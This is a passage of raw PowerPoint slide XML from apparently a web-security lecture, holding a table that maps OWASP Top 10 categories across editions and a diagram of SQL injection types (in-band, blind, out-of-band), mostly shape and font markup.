                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>References</a:t>
                      </a:r>
                      <a:endParaRPr sz="2450">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial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450" spc="-110" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>[Merged+A7]</a:t>
                      </a:r>
                      <a:endParaRPr sz="2450">
                        <a:latin typeface="Trebuchet MS"/>
                        <a:cs typeface="Trebuchet MS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A4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204">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>XML </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-100">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>External </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-75">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Entities </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-254">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>(XXE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="245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100" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>[NEW]</a:t>
                      </a:r>
                      <a:endParaRPr sz="2450">
                        <a:latin typeface="Trebuchet MS"/>
                        <a:cs typeface="Trebuchet MS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342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A5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204">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Cross </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-130">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Site </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-150">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Request </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-125">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Forgery</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="245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315">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>(CSRF)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A5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100">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="245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55">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Misconfiguration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A5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125">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Broken </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-210">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Access </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-70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24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95" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>[Merged]</a:t>
                      </a:r>
                      <a:endParaRPr sz="2450">
                        <a:latin typeface="Trebuchet MS"/>
                        <a:cs typeface="Trebuchet MS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342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A6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100">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Security </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-55">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Misconfiguration</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="245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80" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>(NEW)</a:t>
                      </a:r>
                      <a:endParaRPr sz="2450">
                        <a:latin typeface="Trebuchet MS"/>
                        <a:cs typeface="Trebuchet MS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A6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120">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Sensitive </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-13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245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145">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Exposure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A6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100">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="245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55">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Misconfiguration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9294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A7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114">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Insecure </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-95">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Cryptographic</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="24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140">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Storage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740410">
                        <a:lnSpc>
                          <a:spcPct val="101000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="12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A7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100">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Missing </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-85">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Function </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-150">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Level </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-210">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Access  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-70">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Control</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="245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110" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>[Merged+A4]</a:t>
                      </a:r>
                      <a:endParaRPr sz="2450">
                        <a:latin typeface="Trebuchet MS"/>
                        <a:cs typeface="Trebuchet MS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A7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160">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Cross-Site </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-90">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Scripting</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="24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305">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>(XSS)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9294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A8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110">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Failure </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="2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2450" spc="-95">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Restrict </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-315">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>URL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-2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210">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Access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A8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160">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Cross-Site </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-150">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Request </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-125">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Forgery</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="24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315">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>(CSRF)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1001394">
                        <a:lnSpc>
                          <a:spcPct val="101000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="12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A8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114">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Insecure </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-90">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Deserialization </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-160" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>[NEW,  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-130" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>Community]</a:t>
                      </a:r>
                      <a:endParaRPr sz="2450">
                        <a:latin typeface="Trebuchet MS"/>
                        <a:cs typeface="Trebuchet MS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9294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A9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50">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Insufficient </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-100">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Transport </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-160">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Layer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-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60">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Protection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544195">
                        <a:lnSpc>
                          <a:spcPct val="101000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="12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A9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140">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Using </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-114">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Components </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="20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245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120">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Known  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-70">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Vulnerabilities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911860">
                        <a:lnSpc>
                          <a:spcPct val="101000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="125"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-160">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A9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140">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Using </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-114">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Components </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="20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245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120">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Known  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-70">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Vulnerabilities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9294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450" spc="-145">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A10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90">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Unvalidated </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-125">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Redirects </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-105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114">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Forwards</a:t>
                      </a:r>
                      <a:endParaRPr sz="2450">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial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450" spc="-80" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>(NEW)</a:t>
                      </a:r>
                      <a:endParaRPr sz="2450">
                        <a:latin typeface="Trebuchet MS"/>
                        <a:cs typeface="Trebuchet MS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1050290">
                        <a:lnSpc>
                          <a:spcPct val="101000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="125"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-145">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A10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90">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Unvalidated </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-125">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Redirects </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-105">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>and  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-114">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Forwards</a:t>
                      </a:r>
                      <a:endParaRPr sz="245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450" spc="-145">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-135">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-50">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Insufficient </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-145">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Logging </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="50">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-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50" spc="-20">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Monitoring</a:t>
                      </a:r>
                      <a:endParaRPr sz="2450">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial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450" spc="-155" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>[NEW,Comm.]</a:t>
                      </a:r>
                      <a:endParaRPr sz="2450">
                        <a:latin typeface="Trebuchet MS"/>
                        <a:cs typeface="Trebuchet MS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293430" y="983771"/>
            <a:ext cx="3069749" cy="1087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990536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9"/>
              <a:t>Types </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-305"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-275"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-1115"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-409"/>
              <a:t>Injection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800600" y="2959312"/>
            <a:ext cx="3268979" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3268979" h="948689">
                <a:moveTo>
                  <a:pt x="0" y="158078"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30499" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158078" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110580" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160544" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3203938" y="30499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3238157" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3260598" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3268657" y="158078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3268657" y="790381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3260598" y="840345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3238157" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3203938" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160544" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110580" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158078" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30499" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158078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13761" y="3050662"/>
            <a:ext cx="304101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670">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-280">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Injection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04356" y="3858260"/>
            <a:ext cx="9062085" cy="3157855"/>
            <a:chOff x="1404356" y="3858260"/>
            <a:chExt cx="9062085" cy="3157855"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10434928" y="3889693"/>
              <a:ext cx="0" cy="1099185"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="0" h="1099185">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1098569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74961" y="5009816"/>
              <a:ext cx="6860540" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6860540" h="0">
                  <a:moveTo>
                    <a:pt x="6859966" y="0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35788" y="6035784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499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078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499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47780" y="6126589"/>
            <a:ext cx="379539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20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>In-Band</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-285">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-305">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(Classic)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43526" y="4978383"/>
            <a:ext cx="8900795" cy="2047875"/>
            <a:chOff x="3543526" y="4978383"/>
            <a:chExt cx="8900795" cy="2047875"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3574959" y="500981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60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434928" y="500981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60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993871" y="6046371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499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078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499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194589" y="6136641"/>
            <a:ext cx="4018279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90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Inferential</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-290">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(Blind)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03466" y="4978383"/>
            <a:ext cx="8900795" cy="2072639"/>
            <a:chOff x="10403466" y="4978383"/>
            <a:chExt cx="8900795" cy="2072639"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10434899" y="5009816"/>
              <a:ext cx="6860540" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6860540" h="0">
                  <a:moveTo>
                    <a:pt x="6859966" y="0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853788" y="6070872"/>
              <a:ext cx="4418965" cy="948690"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4418965" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="158079"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078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499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5641482" y="6161771"/>
            <a:ext cx="284416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190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Out-of-Band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0916" y="4978383"/>
            <a:ext cx="16825595" cy="4960620"/>
            <a:chOff x="500916" y="4978383"/>
            <a:chExt cx="16825595" cy="4960620"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="17294866" y="500981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60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574959" y="6984237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59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434928" y="7014886"/>
              <a:ext cx="0" cy="1026160"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="0" h="1026159">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1025965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32349" y="8958669"/>
              <a:ext cx="3113405" cy="948690"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3113404" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="158079"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30500" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64719" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158079" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
